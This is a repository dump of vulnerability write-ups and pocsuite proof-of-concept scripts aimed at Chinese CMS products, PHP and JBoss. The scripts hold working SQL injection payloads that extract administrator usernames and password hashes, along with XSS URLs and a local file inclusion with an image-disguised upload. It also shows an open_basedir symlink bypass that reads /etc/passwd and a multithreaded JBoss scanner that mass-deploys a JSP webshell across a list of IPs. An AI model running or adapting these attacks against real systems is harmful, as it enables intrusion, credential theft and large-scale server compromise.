├── Cscms V4.0.1 app:controllers:api:count.php SQL注入 ├── README.md └── poc.py ├── ESPCMS adminsoft:control:citylist.php SQL注入 ├── README.md └── poc.py ├── FlatPress Cross Site Scripting Vulnerability └── README.md ├── JBoss综合利用 └── Jboss.py ├── PHP 5.2.11:5.3.0 - Multiple Vulnerabilities └── README.md ├── README.md ├── TCCMS V9 app:controller:news.class.php中all函数导致SQL注入 ├── README.md └── poc.py ├── TCCMS V9.0 本地文件包含 ├── README.md └── poc.py ├── WikkaWiki 1.3.2 Spam Logging PHP Injection └── README.md ├── WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities └── README.md ├── Zabbix弱口令 └── Zabbix.py ├── censys_query.py ├── eYou老版本Cookie命令执行 ├── README.md └── eYouExp.php ├── phpoa4.0 任意文件上传 └── README.md ├── phpshe1.4 sql injection ├── README.md └── poc.py └── 新中新校园卡任意文件上传 ├── README.md └── poc.php /Cscms V4.0.1 app:controllers:api:count.php SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # Cscms V4.0.1在app/controllers/api/count.php中param参数sql注入 2 | --- 3 | ### 1. 漏洞成因 4 | 5 | 在/app/controllers/api/count.php中对param参数过滤不严 6 | 7 | 首先来看这段代码 8 | 9 | ``` 10 | function __construct(){ 11 | parent::__construct(); 12 | $this->load->library('user_agent'); 13 | if(!$this->agent->is_referral()) show_error('您访问的页面不存在~!',404,Web_Name.'提醒您'); 14 | //关闭数据库缓存 15 | $this->db->cache_off(); 16 | } 17 | ``` 18 | 必须要对Referer头进行定义才能访问到该页面 19 | 20 | 下面是关键代码 21 | 22 | ``` 23 | public function index() 24 | { 25 | $count=0; 26 | $param=$this->input->get('param',true,true); 27 | if(!empty($param)){ 28 | $str=explode('|', $param); 29 | $table=$str[0]; 30 | if(!empty($table) && $this->db->table_exists(CS_SqlPrefix.$table)){ 31 | $sql=""; 32 | for($j=1;$j".$times." "; 40 | }else{ 41 | if(!empty($v[1])){ 42 | $sql.="and ".$v[0]."='".$v[1]."' "; 43 | }else{ 44 | $sql.="and ".$str[$j]." 
"; 45 | } 46 | } 47 | } 48 | if(substr($sql,0,3)=='and') $sql=substr($sql,3); 49 | if(!empty($sql)) $sql=" where".$sql; 50 | $sql="select id from `".CS_SqlPrefix.$table."` ".$sql; 51 | $count=$this->db->query($sql)->num_rows(); 52 | } 53 | } 54 | echo 'document.writeln("'.$count.'")'; 55 | } 56 | ``` 57 | 58 | 在上面这段代码中可以看到$param由get参数获得,并对此参数进行了一定的过滤操作,输入的空格会被删除 59 | 60 | $str由$param以 | 来进行切分获得,$table为$str第一个元素并作为数据库将要查询的表的名字 61 | 62 | 通过上面的代码我们可以知道,如果$str元素个数只有2个,$v[0]!='times'并且$v[1]为空的时候,$str第二个参数会被直接拼接到$sql的后面 63 | 64 | 可以构造出以下 65 | 66 | ``` 67 | ?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(select/**/concat(char(45,45),adminname,char(45,45,45),adminpass,char(45,45))/**/from/**/v4_admin/**/limit/**/1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a) 68 | ``` 69 | 其中admin作为$table的值,| 后面则是另外一个查询 70 | 71 | 数据库最终执行的语句为: 72 | 73 | ![](http://images.sebug.net/contribute/807cca55-901e-4453-b6b6-23dd5e9b96de-1.png) 74 | 75 | ### 2. 漏洞验证 76 | ![](http://images.sebug.net/contribute/f1631dab-7ec0-456c-a344-5519ca57a5bf-3.png) 77 | 78 | ### 3. 漏洞影响版本 79 | Cscms V4.0.1 且在2015-05-13补丁前的版本 80 | 81 | ### 4. 
漏洞防护方案 82 | 升级到最新版 83 | 84 | 官方补丁对$param参数进行了更严格的过滤: 85 | 86 | ``` 87 | if(!preg_match("/^[a-zA-Z0-9_\|\=\-]+$/", $param)){ 88 | $param=''; 89 | } 90 | ``` -------------------------------------------------------------------------------- /Cscms V4.0.1 app:controllers:api:count.php SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | from pocsuite.net import req 4 | from pocsuite.poc import POCBase, Output 5 | from pocsuite.utils import register 6 | import urlparse 7 | import re 8 | 9 | class TestPOC(POCBase): 10 | vulID = '' # ssvid 11 | version = '1.0' 12 | author = ['Gump'] 13 | vulDate = '2015-08-11' 14 | createDate = '2016-01-15' 15 | updateDate = '2016-01-15' 16 | references = ['http://www.wooyun.org/bugs/wooyun-2015-0113520'] 17 | name = 'CSCMS V4.0.1 app/controllers/api/count.php SQL注入 POC' 18 | appPowerLink = 'http://www.chshcms.com/' 19 | appName = 'CSCMS' 20 | appVersion = '4.0.1' 21 | vulType = 'SQL Injection' 22 | desc = ''' 23 | CSCMS在拼接sql语句的时候过滤不严,把param参数直接拼接到sql语句中导致sql注入,可以获得管理员账户和加密后的密码 24 | ''' 25 | 26 | # 组件安装包下载地址:https://github.com/chshcms/CSCMS-v4.0-UTF8 27 | samples = [''] 28 | 29 | def _attack(self): 30 | result = {} 31 | payload = "?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(select/**/concat(char(45,45),adminname,char(45,45,45),adminpass,char(45,45))/**/from/**/v4_admin/**/limit/**/1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)" 32 | vulurl = urlparse.urljoin(self.url,'index.php/api/count/index' + payload) 33 | head = { 34 | 'Referer':'http://www.baidu.com' 35 | } 36 | resp = req.get(vulurl,headers=head) 37 | # 返回的是500状态码而不是一般的200 38 | if resp.status_code == 500: 39 | match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key',resp.content,re.I | re.M) 40 | if match_result: 41 | result['AdminInfo'] = {} 42 | result['AdminInfo']['Username'] = match_result.group(1) 43 | 
result['AdminInfo']['Password'] = match_result.group(2) 44 | return self.parse_output(result) 45 | 46 | def _verify(self): 47 | result = {} 48 | payload = "?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),md5(1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)" 49 | vulurl = urlparse.urljoin(self.url,'index.php/api/count/index' + payload) 50 | head = { 51 | 'Referer':'http://www.baidu.com' 52 | } 53 | resp = req.get(vulurl,headers=head) 54 | # 返回的是500状态码而不是一般的200 55 | if resp.status_code == 500 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content: 56 | result['VerifyInfo'] = {} 57 | result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'index.php/api/count/index') 58 | result['VerifyInfo']['Payload'] = payload 59 | return self.parse_output(result) 60 | 61 | def parse_output(self, result): 62 | #parse output 63 | output = Output(self) 64 | if result: 65 | output.success(result) 66 | else: 67 | output.fail('Internet nothing returned') 68 | return output 69 | 70 | 71 | register(TestPOC) -------------------------------------------------------------------------------- /ESPCMS adminsoft:control:citylist.php SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # ESPCMS在adminsoft\control\citylist.php SQL注入 2 | --- 3 | 暂无详情,请看POC -------------------------------------------------------------------------------- /ESPCMS adminsoft:control:citylist.php SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | from pocsuite.net import req 4 | from pocsuite.poc import POCBase, Output 5 | from pocsuite.utils import register 6 | import re 7 | import urlparse 8 | 9 | class TestPOC(POCBase): 10 | vulID = '' # ssvid 11 | version = '1.0' 12 | author = ['Gump'] 13 | vulDate = '2015-12-27' 14 | createDate = '2016-01-29' 15 | updateDate = '2016-01-29' 16 | references = 
['http://www.wooyun.org/bugs/wooyun-2015-0163605'] 17 | name = 'ESPCMS V6.6.15.12.09 adminsoft\control\citylist.php SQL注入 POC' 18 | appPowerLink = 'http://www.ecisp.cn/' 19 | appName = 'ESPCMS' 20 | appVersion = 'V6.6.15.12.09' 21 | vulType = 'SQL Injection' 22 | desc = ''' 23 | ESPCMS V6.6.15.12.09在adminsoft\control\citylist.php对参数处理不当导致SQL注入,需要后台其他管理员权限登录 24 | ''' 25 | samples = [''] 26 | # 组件下载地址http://www.ecisp.cn/html/cn/download/ 27 | 28 | # 需要后台登录Cookie,可用其他普通管理员账户登录 29 | def check_argv(self): 30 | logger.log(CUSTOM_LOGGING.WARNING,u"注意,需要后台登录后的cookie") 31 | if self.headers['Cookie']: 32 | # 同时自动设置好User-Agent 33 | self.headers['User-agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36" 34 | logger.log(CUSTOM_LOGGING.WARNING,u"请确保cookie正确") 35 | return True 36 | else: 37 | logger.log(CUSTOM_LOGGING.WARNING,u"请提交后台登录后的cookie") 38 | return False 39 | 40 | def _attack(self): 41 | if self.check_argv(): 42 | result = {} 43 | payload = "?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(char(45,45,45),name,char(45,45,45),password,char(45,45,45)),4,5 FROM espcms_v6.espcms_admin_member" 44 | vulurl = urlparse.urljoin(self.url,'adminsoft/index.php' + payload) 45 | resp = req.get(vulurl) 46 | if resp.status_code == 200: 47 | # 匹配账户密码 48 | match_result = re.search(r'---(.+)---(.+)---',resp.content,re.I | re.M) 49 | if match_result: 50 | result['AdminInfo'] = {} 51 | result['AdminInfo']['Username'] = match_result.group(1) 52 | result['AdminInfo']['Password'] = match_result.group(2) 53 | return self.parse_attack(result) 54 | 55 | def _verify(self): 56 | if self.check_argv(): 57 | result = {} 58 | payload = "?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(floor(rand(0)*2),md5(1)),4,5" 59 | vulurl = urlparse.urljoin(self.url,'adminsoft/index.php' + payload) 60 | resp = req.get(vulurl) 61 | if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' 
in resp.content: 62 | result['VerifyInfo'] = {} 63 | result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'adminsoft/index.php') 64 | result['VerifyInfo']['Payload'] = payload 65 | return self.parse_attack(result) 66 | 67 | def parse_output(self, result): 68 | #parse output 69 | output = Output(self) 70 | if result: 71 | output.success(result) 72 | else: 73 | output.fail('Internet nothing returned') 74 | return output 75 | 76 | 77 | register(TestPOC) -------------------------------------------------------------------------------- /FlatPress Cross Site Scripting Vulnerability/README.md: -------------------------------------------------------------------------------- 1 | # FlatPress Cross Site Scripting Vulnerability 2 | --- 3 | #### 1. 漏洞成因 4 | 5 | 在contact.php、login.php、search.php页面中对输入的转义处理不恰当 6 | 7 | #### 2.漏洞验证 8 | 9 | ``` 10 | http://server/flatpress/contact.php/>"> 11 | ``` 12 | ``` 13 | http://server/flatpress/login.php/>"> 14 | ``` 15 | ``` 16 | http://server/flatpress/search.php/>"> 17 | ``` -------------------------------------------------------------------------------- /JBoss综合利用/Jboss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | # jmx-console和JMXInvokerServlet verify 5 | 6 | import requests 7 | import commands 8 | import sys 9 | import urllib2 10 | from Queue import Queue 11 | import threading 12 | 13 | url_queue = Queue() 14 | jmx_console_vul_queue = Queue() 15 | jmx_invoker_servlet_vul_queue = Queue() 16 | THREAD_NUM = 20 17 | vul_url_txt = open("target.txt","w") 18 | 19 | class Jboss: 20 | def __init__(self): 21 | self.file_name = "t2stj60ss" 22 | self.headers = { 23 | "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36" 24 | } 25 | 26 | def set_url(self,url): 27 | self.url = url 28 | 29 | def output(self,msg): 30 | print msg 31 | exit(0) 32 | 33 | def 
jmxconsole(self): 34 | # print "Checking jmx console" 35 | shell_content = "%3c%25if(request%2egetParameter(%22f%22)!%3dnull)(new+java%2eio%2eFileOutputStream(application%2egetRealPath(%22%2f%22)%2brequest%2egetParameter(%22f%22)))%2ewrite(request%2egetParameter(%22t%22)%2egetBytes())%3b%25%3ec4ca4238a0b923820dcc509a6f75849b" 36 | payload = payload = "?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=" + self.file_name + ".war&argType=java.lang.String&arg1=" + self.file_name + "&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + shell_content + "&argType=boolean&arg4=True" 37 | vul_url = self.url + '/jmx-console/HtmlAdaptor' + payload 38 | # print vul_url 39 | try: 40 | rep = requests.get(vul_url,headers = self.headers,timeout = 5) 41 | payload_code = rep.status_code 42 | if rep.status_code == 200: 43 | return True 44 | elif rep.status_code == 401: 45 | return self.bypass_auth() 46 | except Exception,e: 47 | # print e 48 | pass 49 | return False 50 | return False 51 | 52 | def jmxInvokerServlet(self): 53 | vul_url = self.url + "/invoker/JMXInvokerServlet" 54 | try: 55 | rep = requests.get(vul_url,headers = self.headers,timeout=5) 56 | if rep.status_code == 200: 57 | 58 | return True 59 | res = commands.getoutput("java -jar jboss_exploit_fat.jar -i " + vul_url + " invoke jboss.admin:service=DeploymentFileRepository store " + self.file_name + ".war " + self.file_name + " .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean",shell=True) 60 | if res.find('jboss') < 0 and res.find('Exception') < 0 and res.find('exception') < 0 and res.find('Failed') < 0 and res.find('Mismatch') < 0 and res.find('not found') < 0: 61 | print res 62 | return True 63 | else: 64 | print res 65 | return False 66 | except Exception, e: 67 | pass 68 | return False 69 | return False 70 | 71 | def bypass_auth(self): 72 | shell_content = 
"%3c%25if(request%2egetParameter(%22f%22)!%3dnull)(new+java%2eio%2eFileOutputStream(application%2egetRealPath(%22%2f%22)%2brequest%2egetParameter(%22f%22)))%2ewrite(request%2egetParameter(%22t%22)%2egetBytes())%3b%25%3ec4ca4238a0b923820dcc509a6f75849b" 73 | payload = payload = "?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=" + self.file_name + ".war&argType=java.lang.String&arg1=" + self.file_name + "&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + shell_content + "&argType=boolean&arg4=True" 74 | vul_url = self.url + '/jmx-console/HtmlAdaptor' + payload 75 | try: 76 | opener = urllib2.build_opener(urllib2.HTTPHandler) 77 | request = urllib2.Request(vul_url) 78 | request.add_header("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36") 79 | request.get_method = lambda: 'HEAD' 80 | opener.open(request,timeout = 5) 81 | if request.status == 200: 82 | return True 83 | except Exception,e: 84 | pass 85 | return False 86 | return False 87 | 88 | class testTarget(threading.Thread): 89 | def __init__(self): 90 | threading.Thread.__init__(self) 91 | 92 | def run(self): 93 | global url_queue 94 | global THREAD_NUM 95 | jboss = Jboss() 96 | while not url_queue.empty(): 97 | ip = url_queue.get() 98 | print "Checking http://" + ip + "/" 99 | jboss.set_url("http://" + ip + "/") 100 | if jboss.jmxconsole(): 101 | print ip + " is vulnerable (JmxConsole)" 102 | jmx_console_vul_queue.put(ip) 103 | elif jboss.jmxInvokerServlet(): 104 | print ip + " found (JmxInvokerServlet)" 105 | jmx_invoker_servlet_vul_queue.put(ip) 106 | 107 | def test(): 108 | threads = [] 109 | for i in range(THREAD_NUM): 110 | t = testTarget() 111 | t.start() 112 | threads.append(t) 113 | for t in threads: 114 | t.join() 115 | 116 | if __name__ == '__main__': 117 | ip_txt = open("vul_ip.txt","r") 118 | for line in ip_txt: 119 | 
url_queue.put(line.strip("\n")) 120 | ip_txt.close() 121 | test() 122 | 123 | vul_url_txt.write("JMX-console:\n") 124 | while not jmx_console_vul_queue.empty(): 125 | vul_url_txt.write(jmx_console_vul_queue.get() + "\n") 126 | 127 | vul_url_txt.write("Invoker Servlet:\n") 128 | while not jmx_invoker_servlet_vul_queue.empty(): 129 | vul_url_txt.write(jmx_invoker_servlet_vul_queue.get() + "\n") 130 | 131 | vul_url_txt.close() -------------------------------------------------------------------------------- /PHP 5.2.11:5.3.0 - Multiple Vulnerabilities/README.md: -------------------------------------------------------------------------------- 1 | ### PHP 5.2.11/5.3.0 - Multiple Vulnerabilities 2 | --- 3 | symlink()函数在php中用于创建符号链接,函数原型如下: 4 | 5 | ``` 6 | bool symlink ( string $target , string $link ) 7 | ``` 8 | 9 | 其中$target和$link参数会受到open_basedir的限制,但是可以通过以下的方法来进行绕过。 10 | 11 | 首先来看被限制的情况 12 | 13 | ``` 14 | 18 | ``` 19 | 20 | 执行php sym.php返回如下 21 | 22 | ``` 23 | PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 24 | 25 | Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 26 | ``` 27 | open_basedir会禁止链接到/etc/passwd 28 | 29 | 但是可以试着构造以下的情况, 30 | 31 | 来看下当前目录情况 32 | 33 | ``` 34 | 127# ls -la 35 | total 8 36 | drwxr-xr-x 2 www www 512 Oct 20 00:33 . 37 | drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. 38 | - -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php 39 | - -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php 40 | 127# pwd 41 | /www/test 42 | ``` 43 | 44 | 其中kakao.php代码如下: 45 | 46 | ``` 47 | 69 | ``` 70 | 71 | 这个时候对于symlink来说参数都是合法的。 72 | 73 | 执行php kakao.php,再查看当前目录 74 | 75 | ``` 76 | 127# php kakao.php 77 | 127# ls -la 78 | total 12 79 | drwxr-xr-x 4 www www 512 Oct 20 00:37 . 80 | drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. 
81 | drwxr-xr-x 4 www www 512 Oct 20 00:37 abc 82 | lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd 83 | - -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php 84 | - -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php 85 | drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink 86 | ``` 87 | 88 | 这个时候再来看下exploit文件中的内容 89 | 90 | ``` 91 | 127# cat exploit 92 | root:*:0:0:god:/root:/bin/csh 93 | ... 94 | ... 95 | ``` 96 | 97 | 已经成功把/etc/passwd中的内容显示出来了 98 | 99 | 现在的tmplink是个文件夹,所以链接"exploit"变成了"../../etc/passwd",成功绕开了symlink()中open_basedir对参数的检查。 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Sebug 2 | --- 3 | 包含了Sebug上提交通过或因重复而未通过的漏洞详情或POC 4 | 5 | 还包含少许批量脚本 6 | 7 | --- 8 | ## List 9 | 1. PHP 5.2.11/5.3.0 - Multiple Vulnerabilities 10 | 2. ESPCMS adminsoft/control/citylist.php SQL注入 11 | 3. Cscms V4.0.1 app/controllers/api/count.php SQL注入 12 | 4. phpoa4.0 任意文件上传 13 | 5. phpshe1.4 sql injection 14 | 6. TCCMS V9 app/controller/news.class.php中all函数导致SQL注入 15 | 7. TCCMS V9.0 本地文件包含 16 | 8. WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities 17 | 9. WikkaWiki 1.3.2 Spam Logging PHP Injection 18 | 10. 新中新校园卡任意文件上传 19 | 11. eYou老版本Cookie命令执行 20 | 12. FlatPress Cross Site Scripting Vulnerability 21 | 13. Zabbix弱口令批量检测 22 | 14. JBoss综合getshell批量检测 23 | 24 | --- 25 | ## Censys.io 26 | censys_query.py 可获取censys.io上的ip,用法 27 | 28 | python censys_query.py query_str -------------------------------------------------------------------------------- /TCCMS V9 app:controller:news.class.php中all函数导致SQL注入/README.md: -------------------------------------------------------------------------------- 1 | # TCCMS V9.0 app/controller/news.class.php all函数导致SQL注入 2 | --- 3 | ### 1. 
漏洞成因 4 | 5 | 在app/controller/news.class.php中all函数对参数过滤不严 6 | 7 | ``` 8 | public function all() { 9 | $this->userIsLogin (); 10 | $_Obj = M($this->objName); 11 | $categoryObj = M("category"); 12 | $_Obj->pageSize = 20; 13 | $where = "1=1"; 14 | $key = StringUtil::GetSQLValueString($_POST['key']); 15 | $cid = intval($_GET['cid']); 16 | if ($key != "") { 17 | $where .= " and title like '$key%'"; 18 | } 19 | if (!empty($cid) && $cid != "") { 20 | $where .= " and classid = " . $cid; 21 | } 22 | if ($_GET["type"] == "user") { 23 | $where .= " and uid = " . $_COOKIE['userId']; 24 | } 25 | if (isset($_GET['yz'])) { 26 | $where .= " AND yz =".$_GET['yz']; 27 | } 28 | if (isset($_GET['levels'])) { 29 | $where .= " AND levels =".$_GET['levels']; 30 | } 31 | if (isset($_GET['special'])) { 32 | $where .= " AND special =".$_GET['special']; 33 | } 34 | if (isset($_GET['top'])) { 35 | $where .= " AND top =".$_GET['top']; 36 | } 37 | if (isset($_GET['flashpic'])) { 38 | $where .= " AND flashpic =".$_GET['flashpic']; 39 | } 40 | if (isset($_GET['isphoto'])) { 41 | $where .= " AND isphoto =".$_GET['isphoto']; 42 | } 43 | $_Obj->setSortId(); 44 | $orderBy = $_GET['sortId']; 45 | $_objAry = $_Obj->where($where)->orderby("id ".$orderBy)->getList(); 46 | $this->setValue("categoryObj", $categoryObj); 47 | $this->setValue("objAry", $_objAry); 48 | $this->setValue("Obj", $_Obj); 49 | $this->setValue("action", "list"); 50 | $this->forward("user/newsList.html"); 51 | } 52 | ``` 53 | 54 | 这里从GET和Cookie里获取了很多参数,都没有进行过滤,下面只拿其中的$_COOKIE['userId']来进行测试,其他参数同理 55 | 56 | ### 2. 漏洞验证 57 | poc: 58 | 59 | ``` 60 | union select concat(floor(rand(0)*2),md5(1)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# 61 | ``` 62 | ![](http://images.sebug.net/contribute/1f583546-ded2-4555-bf37-50ae08942b39-tccms2.png) 63 | 64 | ### 3. 影响版本 65 | 66 | TCCMS V9.0 67 | 68 | ### 4. 
漏洞防护方案 69 | 70 | 升级版本 -------------------------------------------------------------------------------- /TCCMS V9 app:controller:news.class.php中all函数导致SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | from pocsuite.net import req 4 | from pocsuite.poc import POCBase, Output 5 | from pocsuite.utils import register 6 | from pocsuite.lib.core.data import logger 7 | from pocsuite.lib.core.enums import CUSTOM_LOGGING 8 | import re 9 | import urlparse 10 | 11 | 12 | class TestPOC(POCBase): 13 | vulID = '' # ssvid 14 | version = '1.0' 15 | author = ['Gump'] 16 | vulDate = '2015-07-25' 17 | createDate = '2016-01-23' 18 | updateDate = '2016-01-23' 19 | references = ['http://www.wooyun.org/bugs/wooyun-2015-0107593'] 20 | name = 'TCCMS V9 app/controller/news.class.php SQL注入 POC' 21 | appPowerLink = 'http://www.teamcen.com/' 22 | appName = 'TCCMS' 23 | appVersion = '9.0' 24 | vulType = 'SQL Injection' 25 | desc = ''' 26 | TCCMS在拼接where语句的时候过滤不严,导致参数直接拼接到sql语句中产生注入,可以获得管理员账户和加密后的密码。这里用cookie里的参数来测试。 27 | ''' 28 | samples = [''] 29 | 30 | # 组件下载地址:http://down.chinaz.com/soft/33822.htm 31 | def check_argv(self): 32 | logger.log(CUSTOM_LOGGING.WARNING,u"注意,需要登录后的cookie,cookie例子:PHPSESSID=xxx; userId=1; AuthenId=xxx") 33 | if self.headers['Cookie']: 34 | if re.search('(userId=\d+)',self.headers['Cookie']): 35 | return True 36 | else: 37 | logger.log(CUSTOM_LOGGING.WARNING,u"输入的cookie不正确") 38 | return False 39 | else: 40 | logger.log(CUSTOM_LOGGING.WARNING,u"请提交登录后的cookie") 41 | return False 42 | 43 | def _attack(self): 44 | if self.check_argv(): 45 | result = {} 46 | payload = re.sub(r'(userId=\d+)','\\1'+' union select concat(char(45,45,45),username,char(45,45,45),password,char(45,45,45)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from tc_user limit 1#',self.headers['Cookie']) 47 | self.headers['Cookie'] = payload 48 | vul_url = 
urlparse.urljoin(self.url,'index.php?ac=news_all&showSql=1&type=user') 49 | resp = req.get(vul_url) 50 | if resp.status_code == 200: 51 | match_result = re.search(r'\(\'---(.+)---(.+)---\'\)',resp.content,re.I | re.M) 52 | if match_result: 53 | result['AdminInfo'] = {} 54 | result['AdminInfo']['Username'] = match_result.group(1) 55 | result['AdminInfo']['Password'] = match_result.group(2) 56 | return self.parse_attack(result) 57 | 58 | def _verify(self): 59 | if self.check_argv(): 60 | result = {} 61 | payload = re.sub(r'(userId=\d+)','\\1'+' union select concat(floor(rand(0)*2),md5(1)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#',self.headers['Cookie']) 62 | self.headers['Cookie'] = payload 63 | vul_url = urlparse.urljoin(self.url,'index.php?ac=news_all&showSql=1&type=user') 64 | resp = req.get(vul_url) 65 | if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content: 66 | result['VerifyInfo'] = {} 67 | result['VerifyInfo']['URL'] = vul_url 68 | result['VerifyInfo']['Payload'] = payload 69 | return self.parse_attack(result) 70 | 71 | def parse_output(self, result): 72 | #parse output 73 | output = Output(self) 74 | if result: 75 | output.success(result) 76 | else: 77 | output.fail('Internet nothing returned') 78 | return output 79 | 80 | 81 | register(TestPOC) -------------------------------------------------------------------------------- /TCCMS V9.0 本地文件包含/README.md: -------------------------------------------------------------------------------- 1 | # TCCMS V9.0 本地文件包含 2 | --- 3 | ### 1. 
漏洞成因 4 | 5 | 在system/core/controller.class.php中Run函数对参数过滤不严 6 | 7 | ``` 8 | public function Run() { 9 | $this->Analysis(); 10 | $this->control = $_GET['c']; 11 | $this->action = $_GET['a']; 12 | if ($_GET['a'] === "list") { 13 | $this->action = "listAll"; 14 | } 15 | //子目录支持 16 | $dir = ''; 17 | if (isset($_GET['d'])) { 18 | $dir .= $_GET['d'].'/'; 19 | } 20 | $adminDir = '/controller/'; 21 | if (defined('IN_ADMIN')) { 22 | $adminDir = '/admin/'; 23 | } 24 | //子模块支持 25 | $module = strcmp(MODULE, "/") == 0 ? 'app' : MODULE; 26 | $controlFile = ROOT_PATH . '/' . $module . $adminDir . $dir.$this->control. '.class.php'; 27 | if (!file_exists($controlFile)) { 28 | $this->setValue("error",$this->control.Config::lang("CONTROLLERNOTEXISTS")); 29 | $this->forward("error.html"); 30 | exit; 31 | } 32 | include($controlFile); 33 | if (!class_exists($this->control)) { 34 | $this->setValue("error",$this->control.Config::lang("CONTROLLERNOTDEFINED")); 35 | $this->forward("error.html"); 36 | exit; 37 | } 38 | $instance = new $this->control(); 39 | if (!method_exists($instance, $this->action)) { 40 | $this->setValue("error", $this->action .Config::lang("METHODNOTFIND")); 41 | $this->forward("error.html"); 42 | exit; 43 | } 44 | $methodName = $this->action; 45 | $instance->$methodName(); 46 | } 47 | ``` 48 | 从GET中获取的d参数未进行过滤,结合PHP 5.3.4以下版本的空字符截断可进行本地文件包含并获取shell;所包含的本地文件可在注册后通过图片上传得到 49 | 50 | ### 2. 漏洞验证 51 | 52 | poc: 53 | 54 | ``` 55 | http://xxx.com/index.php?d=../../uploadfiles/local_filename.jpg%00 56 | ``` 57 | ![](http://images.sebug.net/contribute/13f54833-39b0-421c-af0b-c874998bd7c4-tccms_upload.png) 58 | 59 | ### 3. 影响版本 60 | 61 | TCCMS V9.0 62 | 63 | ### 4. 
防护方案 64 | 65 | 升级版本 -------------------------------------------------------------------------------- /TCCMS V9.0 本地文件包含/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | from pocsuite.net import req 4 | from pocsuite.poc import POCBase, Output 5 | from pocsuite.utils import register 6 | from pocsuite.lib.core.data import logger 7 | from pocsuite.lib.core.enums import CUSTOM_LOGGING 8 | import urlparse 9 | import re 10 | 11 | 12 | class TestPOC(POCBase): 13 | vulID = '' # ssvid 14 | version = '1.0' 15 | author = ['Gump'] 16 | vulDate = '2015-06-30' 17 | createDate = '2016-01-24' 18 | updateDate = '2016-01-24' 19 | references = ['http://www.wooyun.org/bugs/wooyun-2015-0104065'] 20 | name = 'TCCMS V9 本地文件包含 POC' 21 | appPowerLink = 'http://www.teamcen.com/' 22 | appName = 'TCCMS' 23 | appVersion = 'V9' 24 | vulType = 'Local File Inclusion' 25 | desc = ''' 26 | TCCMS在system/core/controller.class.php中对参数过滤不严导致本地文件包含 27 | ''' 28 | samples = [''] 29 | # 组件下载地址:http://down.chinaz.com/soft/33822.htm 30 | 31 | # 需要登录后的cookie 32 | def check_argv(self): 33 | logger.log(CUSTOM_LOGGING.WARNING,u"注意,需要登录后的cookie") 34 | if self.headers['Cookie']: 35 | logger.log(CUSTOM_LOGGING.WARNING,u"请务必确保cookie正确") 36 | return True 37 | else: 38 | logger.log(CUSTOM_LOGGING.WARNING,u"请提交登录后的cookie") 39 | return False 40 | 41 | 42 | def _attack(self): 43 | if self.check_argv(): 44 | result = {} 45 | 46 | self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz" 47 | post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: 